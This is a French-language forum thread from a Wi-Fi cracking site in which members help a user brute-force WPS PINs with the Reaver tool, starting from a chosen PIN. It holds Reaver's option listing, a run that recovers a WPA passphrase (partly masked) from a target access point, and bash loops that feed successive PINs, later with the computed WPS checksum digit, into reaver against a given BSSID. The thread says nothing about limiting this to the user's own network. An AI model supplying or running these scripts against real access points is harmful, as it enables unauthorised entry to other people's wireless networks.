Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 08-11-2012 15:28:12

nabbouti
Membre Hyperactif
Inscription : 30-08-2012
Messages : 60

sauter a une valeur reaver

salut,y a quelqu'un qui peut m'aider a savoir comment puis je commencer directement avec PIN 700000 par exemple ,sur reaver et continuer l'incrementation

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 08-11-2012 17:27:21

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : sauter a une valeur reaver

Si tu écris "reaver" en console tu accèdes aux options

[email protected]:~$ reaver

Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

Required Arguments:
	-i, --interface=<wlan>          Name of the monitor-mode interface to use
	-b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
	-m, --mac=<mac>                 MAC of the host system
	-e, --essid=<ssid>              ESSID of the target AP
	-c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
	-o, --out-file=<file>           Send output to a log file [stdout]
	-s, --session=<file>            Restore a previous session file
	-a, --auto                      Auto detect the best advanced options for the target AP
	-f, --fixed                     Disable channel hopping
	-5, --5ghz                      Use 5GHz 802.11 channels
	-v, --verbose                   Display non-critical warnings (-vv for more)
	-q, --quiet                     Only display critical messages
	-h, --help                      Show help

Advanced Options:
	-p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
	-d, --delay=<seconds>           Set the delay between pin attempts [1]
	-l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [315]
	-g, --max-attempts=<num>        Quit after num pin attempts
	-x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
	-r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
	-t, --timeout=<seconds>         Set the receive timeout period [5]
	-T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
	-S, --dh-small                  Use small DH keys to improve crack speed
	-L, --ignore-locks              Ignore locked state reported by the target AP
	-E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
	-n, --nack                      Target AP always sends a NACK [Auto]
	-w, --win7                      Mimic a Windows 7 registrar [False]

Example:
	reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

[email protected]:~$ 

et tu peux voir l'option -p qui correspond à ta demande... ceci dit elle est buggée dans la version 1.4, il faudrait revoir le code et l'adapter et reprendre l'option -p telle qu'elle est dans la version 1.3 parce que là elle marche bien.
ex:

[email protected]:~$ sudo reaver -i mon0 -b 72:C7:14:XX:XX:XX -p 32450002 -T 3 -vv
[sudo] password for kcdtv: 

Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[?] Restore previous session? [n/Y] n
[+] Waiting for beacon from 72:C7:14:XX:XX:XX
[+] Switching mon0 to channel 8
[+] Associated with 72:C7:14:XX:XX:XX (ESSID: XXXXXXXXXXX83CA)
[+] Trying pin 32450002
[+] Key cracked in 5 seconds
[+] WPS PIN: '32450002'
[+] WPA PSK: 'LKYZEXXXXXXXX'
[+] AP SSID: 'XXXXXXX83CA'
[+] Nothing done, nothing to save.
[email protected]:~$ 
 

Hors Ligne

#3 08-11-2012 17:55:08

nabbouti
Membre Hyperactif
Inscription : 30-08-2012
Messages : 60

Re : sauter a une valeur reaver

merci bien,mais c'est pas ca que je veut et je sais cette methode,mon objectif c'est commencer l'attaque a partir de PIN=70000000 et continuer 
trying pin 70000001
trying Pin 70000002
......etc jusqu'a  99999999
bref de 70000000 à 99999999

Hors Ligne

#4 08-11-2012 18:13:14

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : sauter a une valeur reaver

Il faudra sans doute faire une boucle externe pour ça. Si tu as une version de Reaver où l'option "-p" fonctionne correctement (genre la 1.3) tu peux faire ça comme ça :

#!/bin/bash
for pin1 in {7000..9999} 
do 
     for pin2 in {0000..9999}
     do 
          PIN=$pin1$pin2;     # Merci à Kcdtv pour la correction, voir + bas
          echo "Essai du pin $PIN"
          reaver -p $PIN [...autres options de reaver...]
     done
done

(oui, je sais qu'on pourrait le faire en une seule boucle mais mon Bash implose quand j'essaie...)

Deux remarques :
- cette technique ne permet pas de détecter que la première moitié du PIN est la bonne (c'est l'intérêt de Reaver)
- tous les codes ne sont pas valides, puisque le dernier chiffre est dérivé des 7 premiers
Kcdtv pourra peut-être t'aider sur le second point --> Coder la fonction du checksum sur le huitième chiffre des PIN WPS

Dernière modification par antares145 (11-11-2012 12:23:20)

Hors Ligne

#5 08-11-2012 23:54:15

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : sauter a une valeur reaver

Oui, en gros je peux t'aider en replaçant le code d'antares lol
Mais ce sera demain parce que je suis un petit bashiste en herbe et il faut que je me pense le truc et sans avoir les paupières lourdes et le cerveau ensuqué comme c'est le cas maintenant.
Et puis je suis très, très lent.
Sinon reaver s'en occupe tout seul et n'envoie pas les PIN non conformes, il les essai même pas.

sudo reaver -i mon0 -b 30:39:F2:XX:XX:XX -p 99999999 -vv

Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[?] Restore previous session? [n/Y] n
[+] Waiting for beacon from 30:39:F2:xxxxxxxx
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Associated with 30:39:F2:8xxxxxx (ESSID: Wifixxxxxxxxxxxxxxxxxxxxxxx)
[+] Trying pin 99999995
 

là j'ai mis 99999999 qui n'est pas valide et reaver essaye directement avec 99999995 (valide)

Hors Ligne

#6 11-11-2012 11:34:25

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : sauter a une valeur reaver

Après avoir essayé diverses combinaisons malheureuses pour intégrer le checksum j'ai eu la brillante idée d'essayer le script tel quel et retrouve cet erreur >

[email protected]:~/Escritorio$ sh scipt.sh
scipt.sh: 6: scipt.sh: ={7000..9999}{0000..9999}: not found
Essai du pin 

Je vais regarder si ce n'est pas dans le for etc... qu'est le problème, c'est bien ce qui me semble.
Et ne faudrait il pas d'abord fermer les boucles pour calculer le pin et ensuite le balancer dans reaver?
En changeant cette ligne

$PIN=$pin1$pin2

par celle-ci

PIN=$pin1$pin2

ça me semble plus logique, l'erreur change un peu...

 sh script.sh
Essai du pin {7000..9999}{0000..9999}

Il semble que le problème soit dans l'ennoncé de pin1 et pin2.

Hors Ligne

#7 11-11-2012 11:50:44

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : sauter a une valeur reaver

Jmmm, je pense que c'est dû à la version de Bash utilisée... Ca fonctionne sous Bash 4 (vérifié sur Archlinux 64 et BT5-R3) mais peut-être pas sur les versions antérieures hmm

Ca donne quoi chez toi "bash --version" ?

Hors Ligne

#8 11-11-2012 11:55:44

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : sauter a une valeur reaver

[email protected]:~$ bash --version
GNU bash, versión 4.2.24(1)-release (i686-pc-linux-gnu)
Copyright (C) 2011 Free Software Foundation, Inc.
Licencia GPLv3+: GPL de GNU versión 3 o posterior <http://gnu.org/licenses/gpl.html>

Esto es software libre; usted es libre de cambiarlo y redistribuirlo.
NO hay GARANTÍA, a la extensión permitida por la ley.

Moi j'ai 4.2.24, talalilalère. cool
Sinon je suis sous xubunutu 12.04, la même chose que backtrack mas o menos si cambias plus ou moins si tu change xfce avec gnome ou kde.

Hors Ligne

#9 11-11-2012 12:22:19

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : sauter a une valeur reaver

[[email protected] ~]$ bash --version
GNU bash, version 4.2.39(2)-release (x86_64-unknown-linux-gnu)
Copyright (C) 2011 Free Software Foundation, Inc.
Licence GPLv3+ : GNU GPL version 3 ou ultérieure <http://gnu.org/licenses/gpl.html>

¿ Quieres jugar ? ¡ Vamonos !
4.2.39(2), ¿ que dices ? ¿ Sigues o renuncias ? cool

Tu as raison pour la correction de $PIN en PIN, je vais changer ça dans mon message précédent. Mais avec cette correction, chez moi ça fonctionne hmm

[EDIT] Si empiezas a darme lecciones de Bash, tal vez tendría que preocuparme... big_smile

Dernière modification par antares145 (11-11-2012 12:27:57)

Hors Ligne

#10 11-11-2012 12:32:20

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : sauter a une valeur reaver

Je veux jugar et je ne veux pas renoncer  mais chez moi ça marche poooo...
ensuite je me demandaisd pourquoi le ";" en fin de ligne "PÎN=$pin1$pin2;"
En regardant ici je ne le vois pas >
Bash v4.0+ has inbuilt support for setting up a step value using {START..END..INCREMENT} syntax:

#!/bin/bash
echo "Bash version ${BASH_VERSION}..."
for i in {0..10..2}
  do
     echo "Welcome $i times"
 done

Bash For Loop Examples

Je crois que je commence à comprendre pourquoi ça ne marche pas de mon côté, j'ai enlevé la ligne reaver pour ne pas passer en mode monitor et rester connecter et puis il me faut aussi attribuer les privilèges de sudo... résultat comme elle est avant la fin de la boucle ça fausse tout et pin1 et pin2 restent non définis sous l'état   
{7000..9999}{0000..9999} pam

Hors Ligne

#11 11-11-2012 13:08:02

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : sauter a une valeur reaver

Et c'est ça que tu appelles "essayer le script tel quel" ? big_smile

Si tu veux juste essayer la boucle, enlève juste la ligne "reaver ..." et vérifie avec le 'echo' que le PIN testé est bon. Je t'avoue que je n'ai pas de réseau avec WPS à portée (et surtout pas chez moi !!) donc je n'ai pas testé avec reaver. Pour le ";" il n'est pas nécessaire, un retour à la ligne suffit. Mais j'ai testé la boucle en "one-liner" (tout sur la même ligne de commande) et là j'ai besoin de séparer les commandes avec des ";".

Pour les privilèges, ne mets pas de "sudo" dans le script, appelle plutôt ce dernier avec sudo devant : sudo sh scipt.sh. Ou même mieux, rends ton script exécutable (chmod +x scipt.sh) et appelle-le directement : sudo ./scipt.sh

Héééé, mais attends... Si tu appelles ce script avec "sh" plutôt que "bash", c'est peut-être pour ça que ça ne fonctionne pas !!
Essaie ça :

sudo bash scipt.sh

ou ça :

chmod +x scipt.sh
sudo ./scipt.sh

(la première ligne, avec le hashbang #!, indique quel interpréteur il doit utiliser si on ne le précise pas, donc bash ici)

Si c'est ça et que ça marche, tu me dois l'apéro ! tongue

Dernière modification par antares145 (11-11-2012 13:08:42)

Hors Ligne

#12 11-11-2012 14:01:44

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : sauter a une valeur reaver

Tu le préfère comment le pastis, avec un ou deux glaçons? wink
Ça loope á mort en console...

Et c'est ça que tu appelles "essayer le script tel quel" ?

"mas o menos" tel quel wink tongue.

Pour ce qui est d'intégrer la règle du checksum, Je n'arrive pas à faire mieux...

#!/bin/bash
for pin1 in {7000..9999} 
do 
     for pin2 in {000..999}
     do 
PIN=`expr 10 '*' $pin1$pin2`
ACCUM=0

ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`

DIGIT=`expr $ACCUM '%' 10`
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`

echo "Essai du pin $pin1$pin2$CHECKSUM"

reaver -p $pin1$pin2$CHECKSUM -b 00:11:22:33:44:55
     done
done

Si j'apelle "$PIN" au lieu de "$pin1$pin2$CHECKSUM" directement, la règle du checksum n'est pas appliquée, c'est toujours un zéro en fin de ligne... sad

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Problème reaver par Antho3674
4 301 15-11-2016 22:05:12 par kcdtv
Épinglée :
253 135958 17-09-2016 22:11:01 par Zetta
5 730 18-07-2016 23:13:58 par kcdtv
PKR Reaver par Nounours
7 978 07-01-2016 18:29:10 par Nounours
11 1578 02-12-2015 17:26:29 par Seska

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.028 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]